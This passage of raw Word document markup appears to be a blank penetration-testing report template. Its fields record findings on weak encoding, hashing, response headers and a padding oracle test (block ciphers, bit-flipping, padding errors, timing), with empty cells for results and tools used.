          </w:tcPr>
          <w:p w14:paraId="138049DD" w14:textId="6A92A864" w:rsidR="00D9021C" w:rsidRPr="0078486F" w:rsidRDefault="00D9021C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D9021C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Sensitive Data Encoded in Cookies/Local Storage?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B9E5DCE" w14:textId="62579390" w:rsidR="00D9021C" w:rsidRPr="0078486F" w:rsidRDefault="00D9021C" w:rsidP="00C73FB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D9021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Details if found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D9021C" w:rsidRPr="00C73FBD" w14:paraId="2155534B" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:trHeight w:val="647"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="277C164F" w14:textId="6CBC9A09" w:rsidR="00D9021C" w:rsidRPr="00D9021C" w:rsidRDefault="00D9021C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D9021C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Hidden Fields Containing Encoded Data?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E709D74" w14:textId="37E65B01" w:rsidR="00D9021C" w:rsidRDefault="00D9021C" w:rsidP="00C73FB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D9021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Decoded Data if found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D9021C" w:rsidRPr="00C73FBD" w14:paraId="6A74F1FD" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:trHeight w:val="647"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7FE90710" w14:textId="15696E40" w:rsidR="00D9021C" w:rsidRPr="00D9021C" w:rsidRDefault="00D9021C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D9021C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Weak Hashing Identified in URL Parameters?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22CA66F6" w14:textId="77777777" w:rsidR="00D9021C" w:rsidRDefault="00D9021C" w:rsidP="00C73FB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D9021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Hash Type: MD5, SHA-1,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40DC4DE" w14:textId="77777777" w:rsidR="00D9021C" w:rsidRDefault="00D9021C" w:rsidP="00C73FB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9C0F49D" w14:textId="0ED19F7C" w:rsidR="00D9021C" w:rsidRDefault="00D9021C" w:rsidP="00C73FB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141028" w:rsidRPr="00C73FBD" w14:paraId="7ED47E73" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:trHeight w:val="647"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39EDC46B" w14:textId="3F312A9C" w:rsidR="00141028" w:rsidRPr="00D9021C" w:rsidRDefault="00141028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141028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>Vulnerabilities in HTTP Response Headers?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17A9AB3D" w14:textId="77777777" w:rsidR="00141028" w:rsidRDefault="00141028" w:rsidP="00C73FB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14102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Misconfigured CSP, Weak Encoding Directives,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0B04C22" w14:textId="77777777" w:rsidR="00141028" w:rsidRDefault="00141028" w:rsidP="00C73FB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19511B0" w14:textId="2A23E9ED" w:rsidR="00141028" w:rsidRDefault="00141028" w:rsidP="00C73FBD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78486F" w:rsidRPr="00C73FBD" w14:paraId="0BBB8DC2" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:trHeight w:val="647"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49033A4D" w14:textId="43D85DC9" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="00141028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Other </w:t>
            </w:r>
            <w:r w:rsidR="0078486F" w:rsidRPr="00C73FBD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Identified Weak Encoding Techniques </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1363845F" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="188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BD9EC14" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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242A49E" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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1B203DB" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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54AED2E" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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BE06CD3" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="0078486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78486F" w:rsidRPr="00C73FBD" w14:paraId="0CB9F667" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="713921C0" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F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3FBD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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37D0B41E" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="189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C9AB5FE" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="189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644BBF9" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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5EC0C1D" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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B99610B" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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62CB8CA" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="0078486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1568A" w:rsidRPr="00C73FBD" w14:paraId="0BB240CB" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36058237" w14:textId="2084C5F8" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A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57473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>AI Tools Used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(If any)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20AB7936" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="0004313F" w:rsidRDefault="00F1568A" w:rsidP="00F156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04313F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*Gemini, Copilot, Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D55D658" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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C614C21" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A" w:rsidP="00F156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1568A" w:rsidRPr="00C73FBD" w14:paraId="348756C7" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C42D3D2" w14:textId="110CE3FC" w:rsidR="00F1568A" w:rsidRDefault="00F1568A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</w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00357473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3692F152" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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E40A829" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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0545A5F" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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AC50CC3" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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1568A" w:rsidRPr="00C73FBD" w14:paraId="7A402DA0" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43720FD5" w14:textId="0B234685" w:rsidR="00F1568A" w:rsidRPr="00357473" w:rsidRDefault="00F1568A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6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E350313" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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15513C4" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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1CE7B49" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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9D63872" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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1568A" w:rsidRPr="00C73FBD" w14:paraId="390B18C5" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1139E992" w14:textId="32A14F21" w:rsidR="00F1568A" w:rsidRPr="00A54B18" w:rsidRDefault="00F1568A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Results Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FFD9ACB" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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173EF00" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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4E838A4" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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66D6FA0" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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687461E" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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DD4420A" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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BC83ED7" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F156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5C2462D" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A" w:rsidP="00F1568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1568A" w:rsidRPr="00A51A96" w14:paraId="70CAEE50" w14:textId="77777777" w:rsidTr="008E7163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E8E8E8" w:themeFill="background2"/>
        </w:tblPrEx>
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="125" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="47570796" w14:textId="441A98EE" w:rsidR="00F1568A" w:rsidRPr="003C713F" w:rsidRDefault="00F1568A" w:rsidP="00972D9E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10.</w:t>
            </w:r>
            <w:r w:rsidR="00620BDC">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>4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F1568A">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Padding Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31FA746D" w14:textId="77777777" w:rsidR="008019CE" w:rsidRPr="008E7163" w:rsidRDefault="008019CE" w:rsidP="00C73FBD">
      <w:pPr>
        <w:jc w:val="left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98"/>
        <w:gridCol w:w="6862"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w14:paraId="4E1B9136" w14:textId="77777777" w:rsidTr="008E716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023EBC33" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A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3FBD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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BC6A102" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD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1568A" w:rsidRPr="00C73FBD" w14:paraId="276BF031" w14:textId="77777777" w:rsidTr="008E716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129E9A0A" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A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3FBD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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="698827CE" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD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1568A" w:rsidRPr="00C73FBD" w14:paraId="4F8727D7" w14:textId="77777777" w:rsidTr="008E716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72EA3FEB" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A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3FBD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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FA31C73" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD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1568A" w:rsidRPr="00C73FBD" w14:paraId="5A835207" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:trHeight w:val="1079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590E6B48" w14:textId="4F9AC85A" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A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F1568A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Encrypted Data Identified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19369488" w14:textId="0738C0AE" w:rsidR="00F1568A" w:rsidRPr="00C73FBD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C73FB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F1568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 Base64-Encoded Values if found</w:t>
            </w:r>
            <w:r w:rsidRPr="00C73FB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DECE40B" w14:textId="77777777" w:rsidR="00F1568A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3F57481" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD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1568A" w:rsidRPr="00C73FBD" w14:paraId="3007A74B" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:trHeight w:val="647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7AEEB639" w14:textId="1106AB81" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A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F1568A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Block Cipher Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A05100E" w14:textId="77777777" w:rsidR="00F1568A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78486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F1568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AES, DES, Blowfish, etc., Block Size: 8/16 Bytes</w:t>
            </w:r>
            <w:r w:rsidRPr="0078486F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55BECD9" w14:textId="77777777" w:rsidR="00590583" w:rsidRDefault="00590583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2D1A730" w14:textId="4BC812F5" w:rsidR="00590583" w:rsidRPr="0078486F" w:rsidRDefault="00590583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1568A" w:rsidRPr="00C73FBD" w14:paraId="49A19A6F" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:trHeight w:val="647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30A9AD55" w14:textId="55B712C6" w:rsidR="00F1568A" w:rsidRPr="0078486F" w:rsidRDefault="00F1568A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D9021C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Sensitive Data Encoded in Cookies/Local Storage?</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00F1568A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Bit-Flipping Attack Attempted?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="786B5B7C" w14:textId="347E7E69" w:rsidR="00F1568A" w:rsidRPr="0078486F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F1568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Observed Response Variations?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F1568A" w:rsidRPr="00C73FBD" w14:paraId="3F5A664A" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:trHeight w:val="647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57AE6DDD" w14:textId="4CAEBF23" w:rsidR="00F1568A" w:rsidRPr="00D9021C" w:rsidRDefault="00F1568A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F1568A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Padding Error Messages Observed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C095E0A" w14:textId="77777777" w:rsidR="00F1568A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F1568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Examples: ASP.NET, Java BadPaddingException,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F7A4011" w14:textId="77777777" w:rsidR="00590583" w:rsidRDefault="00590583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5CE4208" w14:textId="77777777" w:rsidR="00590583" w:rsidRDefault="00590583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9B99372" w14:textId="2629E1E4" w:rsidR="00590583" w:rsidRDefault="00590583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1568A" w:rsidRPr="00C73FBD" w14:paraId="01FF792A" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:trHeight w:val="647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0A12F19D" w14:textId="79B41A16" w:rsidR="00F1568A" w:rsidRPr="00D9021C" w:rsidRDefault="00F1568A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F1568A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Timing Analysis Conducted?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13CBC784" w14:textId="4A76B3E0" w:rsidR="00F1568A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F1568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Notable Response Time Differences?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BB1BE44" w14:textId="77777777" w:rsidR="00F1568A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CDCE9BB" w14:textId="77777777" w:rsidR="00F1568A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1568A" w:rsidRPr="00C73FBD" w14:paraId="4985C23F" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:trHeight w:val="647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40D7E5A6" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00D9021C" w:rsidRDefault="00F1568A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141028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Vulnerabilities in HTTP Response Headers?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3591DD49" w14:textId="77777777" w:rsidR="00F1568A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14102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Misconfigured CSP, Weak Encoding Directives,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7E30B0B" w14:textId="77777777" w:rsidR="00F1568A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2A6C90D" w14:textId="77777777" w:rsidR="00F1568A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C2B7074" w14:textId="77777777" w:rsidR="00590583" w:rsidRDefault="00590583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1568A" w:rsidRPr="00C73FBD" w14:paraId="21701F77" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:trHeight w:val="647"/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2B79B5E4" w14:textId="62FCC9F5" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A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Other Vulnerabilities Identified</w:t>
            </w:r>
            <w:r w:rsidRPr="00C73FBD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6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7743BED8" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A" w:rsidP="008A087A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="223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CFD6E8F" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A" w:rsidP="008A087A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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1875B2A" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A" w:rsidP="008A087A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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0C10D6F" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A" w:rsidP="008A087A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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92D377C" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A" w:rsidP="008A087A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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6B679ED" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD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1568A" w:rsidRPr="00C73FBD" w14:paraId="749C2942" w14:textId="77777777" w:rsidTr="008E716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6573CBB4" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A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3FBD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Tools/Services Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="265AB06D" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="191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02F1EFE" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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AC49E23" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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3F37078" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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D2E85F5" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19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CD5E417" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD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1568A" w:rsidRPr="00C73FBD" w14:paraId="49286B2D" w14:textId="77777777" w:rsidTr="008E716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25E7C030" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="00C73FBD" w:rsidRDefault="00F1568A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57473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>AI Tools Used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(If any)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46C4CAFA" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRPr="0004313F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04313F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*Gemini, Copilot, Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06ABB4FC" w14:textId="77777777" w:rsidR="00F1568A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CD80848" w14:textId="77777777" w:rsidR="00F1568A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2C06D84" w14:textId="77777777" w:rsidR="00925905" w:rsidRDefault="00925905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44AEB10" w14:textId="77777777" w:rsidR="00925905" w:rsidRPr="00C73FBD" w:rsidRDefault="00925905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1568A" w:rsidRPr="00C73FBD" w14:paraId="740BF654" w14:textId="77777777" w:rsidTr="008E716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2EA47730" w14:textId="77777777" w:rsidR="00F1568A" w:rsidRDefault="00F1568A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b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00357473">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
